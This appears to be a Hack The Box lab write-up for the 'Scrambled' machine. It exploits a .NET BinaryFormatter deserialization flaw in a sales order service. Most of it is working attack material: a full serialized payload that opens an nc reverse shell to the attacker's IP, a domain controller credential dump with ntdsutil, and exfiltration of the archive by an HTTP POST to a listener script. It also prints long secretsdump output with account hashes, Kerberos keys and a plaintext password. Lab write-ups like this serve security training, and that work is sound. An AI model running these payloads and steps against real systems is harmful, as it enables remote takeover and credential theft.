Deserialization Attack
after transferring the client-side program for the sales order application to a windows environment, an in-depth analysis of the program unfolded as the executables underwent decompilation. additionally, wireshark was employed to observe network traffic, enabling comprehensive packet inspection to further understand the execution flow. consequently, a critical vulnerability in the client-side program for the sales order application was identified. it uses the vulnerable and obsolete binary formatter type serializing/deserializing .NET objects without implementing any input sanitization, rendering it susceptible to Deserialization Attacks.
deserialization attack exploit vulnerabilities in the deserialization process of data, manipulating serialized objects to execute unauthorized actions. in the context of the .net framework, deserialization attacks specifically target weaknesses in the deserialization mechanisms of .net applications. particularly concerning is the exploitation of the binary formatter type, a component in the .NET framework that is notorious for malicious manipulation. Attackers leverage these vulnerabilities to compromise the integrity of .NET applications, potentially leading to security risks such as remote code execution, privilege escalation, and unauthorized access to sensitive data. These threats emphasize the critical need for secure coding practices and vigilant input validation, especially when dealing with the Binary Formatter type, to fortify against Deserialization Attacks in .NET applications.
given the binary formatter type is confirmed to be present and used by the client-side program, there’s a high probability that the server-side program also employs the same. The object is to forge a malicious serialize payload for the server-side program to receive and deserialize. Since no form of input sanitization is supposedly in place, the server-side program will execute the deserialized payload.
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ cat payload.txt
UPLOAD_ORDER;AAEAAAD/////AQAAAAAAAAAMAgAAAEZTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAABAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsbXNjb3JsaWJdXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYISVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLG1zY29ybGliXV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAASVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLG1zY29ybGliXV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAADMvYyBDOlxcVGVtcFxcbmM2NC5leGUgMTAuMTAuMTYuOCAxMjM0IC1lIHBvd2Vyc2hlbGwGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAAJIBU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZ10sW1N5c3RlbS5TdHJpbmddLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyxTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAAhtc2NvcmxpYgoGDQAAAEZTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIGAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEKAAAACQAAAAYVAAAAB0NvbXBhcmUJDAAAAAYXAAAADVN5c3RlbS5TdHJpbmcGGAAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGQAAACRTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nXV0JDAAAAAoJDAAAAAkXAAAACRUAAAAKCw==Now that the payload is ready, I can sent it to the server-side program of the Sales Order application
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ cat payload.txt | nc $IP 4411
SCRAMBLECORP_ORDERS_V1.0.3;
ERROR_GENERAL;Error deserializing sales order: Unable to cast object of type 'System.Collections.Generic.SortedSet`1[System.String]' to type 'ScrambleLib.SalesOrder'.Sending
┌──(kali㉿kali)-[~/…/smb/IT/Apps/Sales Order Client]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.168] 60231
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> hostname
hostname
DC1
PS C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::248
IPv6 Address. . . . . . . . . . . : dead:beef::489:296d:9719:61ba
Link-local IPv6 Address . . . . . : fe80::489:296d:9719:61ba%14
IPv4 Address. . . . . . . . . . . : 10.10.11.168
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%14
10.10.10.2System Level Compromise
Hashdump
ps c:\Windows\system32> powershell -ep bypass -nop -c "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\Temp\LSA' q q"
c:\Windows\system32\ntdsutil.exe: ac i ntds
Active instance set to "ntds".
c:\Windows\system32\ntdsutil.exe: ifm
ifm: create full c:\Temp\LSA
Creating snapshot...
Snapshot set {608a152d-376f-48b3-b938-fae087f7aac3} generated successfully.
snapshot {12553cfc-bc1a-4256-9830-c30bbaa63087} mounted as c:\$SNAP_202311210115_VOLUMEC$\
Snapshot {12553cfc-bc1a-4256-9830-c30bbaa63087} is already mounted.
Initiating DEFRAGMENTATION mode...
source database: C:\$SNAP_202311210115_VOLUMEC$\Windows\NTDS\ntds.dit
target database: c:\Temp\LSA\Active Directory\ntds.dit
Defragmentation Status (omplete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Copying registry files...
copying c:\Temp\LSA\registry\SYSTEM
copying c:\Temp\LSA\registry\SECURITY
Snapshot {12553cfc-bc1a-4256-9830-c30bbaa63087} unmounted.
ifm media created successfully in c:\Temp\LSA
ifm: q
c:\Windows\system32\ntdsutil.exe: qdumping lsa secrets with the lolbas ntdsitil.exe
ps c:\Windows\system32> Compress-Archive -Path C:\Temp\LSA\* -DestinationPath C:\Temp\secret.zip
ps c:\Windows\system32> iwr -Uri 'http://10.10.16.8:2222' -Method POST -InFile 'C:\Temp\secret.zip'Archiving secrets into the secret.zip file and sending it over a HTTP post request
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/hashdump]
└─$ cat post.py
from http.server import BaseHTTPRequestHandler, HTTPServer
class myrequesthandler(basehttprequesthandler):
def do_post(self):
content_length = int(self.headers['Content-Length'])
data = self.rfile.read(content_length)
with open('secret.zip', 'wb') as f:
f.write(data)
self.send_response(200)
httpd = HTTPServer(('0.0.0.0', 2222), MyRequestHandler)
httpd.serve_forever()
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/hashdump]
└─$ python3 post.py
10.10.11.168 - - [21/nov/2023 02:21:45] "POST / HTTP/1.1" 200 -A local python web server will receive and save the archive
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/hashdump]
└─$ unzip secret.zip
archive: secret.zip
warning: secret.zip appears to use backslashes as path separators
inflating: Active Directory/ntds.dit
inflating: Active Directory/ntds.jfm
inflating: registry/SECURITY
inflating: registry/SYSTEM Extracting
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/hashdump]
└─$ impacket-secretsdump local -ntds Active\ Directory/ntds.dit -system registry/SYSTEM -security registry/SECURITY -outputfile hashdump
Impacket v0.11.0 - Copyright 2023 Fortra
[*] target system bootkey: 0x33d8cbadba9e3f89bd60e5bfe64743e3
[*] dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$machine.acc:plain_password_hex:5269bba2bad286c317ec1bb4568b061d06e79c4e76f176b0c921ffeabcd6777b46aa7f8e3108233c2d75153934b179e7eb4ea96d65eb0b413612ddef56954a0588b84c3917b3fa25c9915b8f1c81a3b7b816f47d0ca71ef5a27d0da5d32d99f5c2f8a68f9f8890b8b32669d64ad2db7638bcb7691d8c03669fb4af6a2cf7e17b7898785560c0feb682135a41be892384388d6d4d376d17cb46130abe4ea3c320b34ef8524159e824e1b003fa5c50d0020f0e6e3ec355106f0c61a5fd6e16de87611971a2ddb66435c18eb80bc22164b9569212e83405b610cf0c0b7d4cf3379d23b7118a32163b629ab21bc308edea9b
$machine.acc: aad3b435b51404eeaad3b435b51404ee:594093e0491c6a7cf0bbc79ccba44cbb
[*] DPAPI_SYSTEM
dpapi_machinekey:0x4ab612c4226c2692f6ce3f80641ce3e4408d239d
dpapi_userkey:0xb6e5e458779f178490f1f538817c9a32b569b4f0
[*] NL$KM
0000 62 71 97 10 59 D7 07 E3 89 26 B4 42 EC 2B FA 4F bq..Y....&.B.+.O
0010 76 3D 66 31 E5 EF 65 1A C0 92 DD 19 D6 8B A1 26 v=f1..e........&
0020 9F 3F F7 12 07 ED CB 12 BE 39 F4 41 ED 98 F1 77 .?.......9.A...w
0030 E4 82 6C 19 7E CA 24 B3 A7 81 C7 72 AD E0 30 A0 ..l.~.$....r..0.
nl$km:6271971059d707e38926b442ec2bfa4f763d6631e5ef651ac092dd19d68ba1269f3ff71207edcb12be39f441ed98f177e4826c197eca24b3a781c772ade030a0
[*] _SC_MSSQLSERVER
(unknown user):Pegasus60
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] pek # 0 found and decrypted: ef94c97fa7aa487976e212fe89d89cf9
[*] Reading and decrypting hashes from Active Directory/ntds.dit
scrm.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:e2bba07a8348bca150ac6ffee6a3afbb:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dc1$:1000:aad3b435b51404eeaad3b435b51404ee:594093e0491c6a7cf0bbc79ccba44cbb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0d3c072340cb5cdfca9c7f86e47a0beb:::
scrm.local\tstar:1106:aad3b435b51404eeaad3b435b51404ee:5b8b52689acd5a0e6587f9c8d3b07fc7:::
scrm.local\asmith:1107:aad3b435b51404eeaad3b435b51404ee:0a7e978fd5e254ce555e5fed405bba29:::
scrm.local\sjenkins:1118:aad3b435b51404eeaad3b435b51404ee:ac5495fa8515a5e8c3437a293b405e26:::
scrm.local\sdonington:1119:aad3b435b51404eeaad3b435b51404ee:ac5495fa8515a5e8c3437a293b405e26:::
ws01$:1120:aad3b435b51404eeaad3b435b51404ee:327202ce3bff07c2ea53d7f25d162fcb:::
scrm.local\backupsvc:1601:aad3b435b51404eeaad3b435b51404ee:6f410302e092bdcf7802401cc55e4a4d:::
scrm.local\jhall:1603:aad3b435b51404eeaad3b435b51404ee:dfdcc85f5a1c9eaf0592f36582f3b871:::
scrm.local\rsmith:1604:aad3b435b51404eeaad3b435b51404ee:dfdcc85f5a1c9eaf0592f36582f3b871:::
scrm.local\ehooker:1605:aad3b435b51404eeaad3b435b51404ee:a0a5fa8b2f1df7d4acfca315e4a3ba82:::
scrm.local\khicks:1611:aad3b435b51404eeaad3b435b51404ee:589cf9b5f911fd6fe70694a4ba4bccd0:::
scrm.local\sqlsvc:1613:aad3b435b51404eeaad3b435b51404ee:b999a16500b87d17ec7f2e2a68778f05:::
scrm.local\miscsvc:1617:aad3b435b51404eeaad3b435b51404ee:c959a21bb08e42e36ff9f0fa434caab5:::
scrm.local\ksimpson:1619:aad3b435b51404eeaad3b435b51404ee:5f38c0485f0c23f8dedf9bf23ffa5336:::
[*] Kerberos keys from Active Directory/ntds.dit
scrm.local\administrator:aes256-cts-hmac-sha1-96:36e4dac77fe883a268dae5959a54128023e108aa07b89b8b73519422316e50a8
scrm.local\administrator:aes128-cts-hmac-sha1-96:1eb10b3e4697f7d382b705a2b68712c3
scrm.local\administrator:des-cbc-md5:5dc7897ccd51378a
dc1$:aes256-cts-hmac-sha1-96:fe504fd0f75a3683dfe9039847378bc4edf1bf4232a97d6561c5d5e66916c299
dc1$:aes128-cts-hmac-sha1-96:f490bf5e7eb88bc52c7d5b9ed86c2706
dc1$:des-cbc-md5:0ecebac4ec265294
krbtgt:aes256-cts-hmac-sha1-96:ec8ffcc60b59e5ad55c36c7c09d9a489fa0d234071f20161050a52e856ed7d4f
krbtgt:aes128-cts-hmac-sha1-96:a34f1cc2de2958520eeed9e18bca4421
krbtgt:des-cbc-md5:0dfbc29eb69d4f6b
scrm.local\tstar:aes256-cts-hmac-sha1-96:e65003be7b1c695af613c340ce191ba5d45ea0f96e1a8dc72fda9ca5cca3f692
scrm.local\tstar:aes128-cts-hmac-sha1-96:50baa648ad74414f224d07567da673d7
scrm.local\tstar:des-cbc-md5:e98fa1ef4adf9ebc
scrm.local\asmith:aes256-cts-hmac-sha1-96:1f3c52c23649a125ee09d3e2841b50e1acdab75e9d9665043f2448ca6c3481f0
scrm.local\asmith:aes128-cts-hmac-sha1-96:1b11a8336495ed364a06b55583dfcfb9
scrm.local\asmith:des-cbc-md5:e32f79e52cefcd4c
scrm.local\sjenkins:aes256-cts-hmac-sha1-96:072a34e1316a82b036ce4c2d2bbefb427654f23fb7f896b4cab4f8af43853ae8
scrm.local\sjenkins:aes128-cts-hmac-sha1-96:7067e7b2e64274d125ee28844cb0fb31
scrm.local\sjenkins:des-cbc-md5:797345f4808c31a4
scrm.local\sdonington:aes256-cts-hmac-sha1-96:c571f1501a00036d3dd60714c8820ff40081de5d09313ae0e3bc7fe1fd9890ec
scrm.local\sdonington:aes128-cts-hmac-sha1-96:13311a42f06cd3d735150f2cc11aa318
scrm.local\sdonington:des-cbc-md5:e5d0c29bc7c443b0
ws01$:aes256-cts-hmac-sha1-96:0a9966114845e08ca3f2eb60de8984c424b399a1f1114c8475a6efefb21f8700
ws01$:aes128-cts-hmac-sha1-96:56e7edc2b762c5d66c58e5119c67d5ec
ws01$:des-cbc-md5:6e91105ee3f49ba4
scrm.local\backupsvc:aes256-cts-hmac-sha1-96:3ba60371bedb6e1e867c881caedf643ad0bc1eca881c5134d27fa18551f3022a
scrm.local\backupsvc:aes128-cts-hmac-sha1-96:1027ee62c7659701ec05d36e43141307
scrm.local\backupsvc:des-cbc-md5:201c57a76b7ffe6d
scrm.local\jhall:aes256-cts-hmac-sha1-96:c3c4594a81241c7ff8adcbd38a32e99a59ba7da632087cd1542836360bbe3d20
scrm.local\jhall:aes128-cts-hmac-sha1-96:c59f8f35dd859f8e428ca138fe111997
scrm.local\jhall:des-cbc-md5:a4fddc4383cd2367
scrm.local\rsmith:aes256-cts-hmac-sha1-96:061ef9b9f7707cd59c7389280dfb5b1e4ea876f12ff9a99db707c00318c1d1b7
scrm.local\rsmith:aes128-cts-hmac-sha1-96:fb2734a93948639ec85a19e80f651c03
scrm.local\rsmith:des-cbc-md5:6df8fb9207c1bf8a
scrm.local\ehooker:aes256-cts-hmac-sha1-96:f0b36edfdd0abea2d05feaa5d073e8e0b0f383408d83595968c5aeb09a0194be
scrm.local\ehooker:aes128-cts-hmac-sha1-96:752105175d8ffd69b581457d70acc691
scrm.local\ehooker:des-cbc-md5:4586e61ac7c16867
scrm.local\khicks:aes256-cts-hmac-sha1-96:40d9413a4cf02afed13a66dc093362417128759743d2af691cd111307314bd2c
scrm.local\khicks:aes128-cts-hmac-sha1-96:215847272a6bb30a43ea1db062962495
scrm.local\khicks:des-cbc-md5:70da1cb6d30449a4
scrm.local\sqlsvc:aes256-cts-hmac-sha1-96:f19a7078cfc8ec0d0cf9340dcae67a9f33ed6223d10fac1d273b274a97c510f5
scrm.local\sqlsvc:aes128-cts-hmac-sha1-96:33217b54c9017b85f881bee06b858bea
scrm.local\sqlsvc:des-cbc-md5:6eae9eb5b02910c1
scrm.local\miscsvc:aes256-cts-hmac-sha1-96:975103955c330cf30771708d203646214cc782f7260de7f5ee2203b4b6449a20
scrm.local\miscsvc:aes128-cts-hmac-sha1-96:f7e14c834675e9606f90df39508dddca
scrm.local\miscsvc:des-cbc-md5:9d1fd083d0e94ffd
scrm.local\ksimpson:aes256-cts-hmac-sha1-96:d9e46cdd6e5c41f82e751602e57e9f36df55a35483cff101d396c3ea1503fd84
scrm.local\ksimpson:aes128-cts-hmac-sha1-96:6cf5574c3a94fa3138ebbc7b51646699
scrm.local\ksimpson:des-cbc-md5:abc1eaa1d9dcf2da
[*] Cleaning up... Domain Level Compromise